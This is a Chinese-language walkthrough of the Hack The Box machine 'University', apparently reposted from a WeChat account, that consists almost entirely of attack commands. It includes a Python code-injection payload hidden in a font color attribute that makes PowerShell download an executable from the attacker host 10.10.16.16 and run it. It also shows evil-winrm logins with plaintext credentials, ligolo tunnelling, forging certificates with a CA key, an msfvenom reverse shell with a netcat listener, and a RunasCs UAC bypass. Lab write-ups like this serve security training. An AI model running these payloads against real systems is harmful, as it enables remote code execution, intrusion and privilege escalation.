知识点:内网渗透
kali:10.10.16.16
nmap -sV -sC -O -oN nmap.txt 10.10.11.39
openssl req -newkey rsa:2048 -keyout PK.key -out My-CSR.csr
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell Invoke-WebRequest -Uri http://10.10.16.16/nameme.exe -OutFile ./nameme.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell Start-Process ./nameme.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
evil-winrm -u 'WAO' -p 'WebAO1337' -i 10.10.11.39
sudo ./proxy -selfcert -laddr 0.0.0.0:443
upload agent.exe
./agent.exe -connect 10.10.16.16:443 -ignore-cert
# kali其他终端
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 192.168.99.0/24 dev ligolo
# ligolo终端
session
1
start
evil-winrm -u 'WAO' -p 'WebAO1337' -i 192.168.99.2
openssl req -newkey rsa:2048 -keyout George_PK.key -out George_CSR.csr
openssl x509 -req -in George_CSR.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -out george.pem -days 365
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.99.12 LPORT=4448 -f exe > shell4448.exe
nc -lnvp 4448
gpg --export -a "george" > george.asc
gpg -u george --detach-sign shell.zip
./RunasCs.exe --bypass-uac -l 5 WAO WebAO1337 nameme.exe
cat /users/administrator/desktop/root.txt
原文始发于微信公众号(Rsec):HTB靶场University [Insane]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论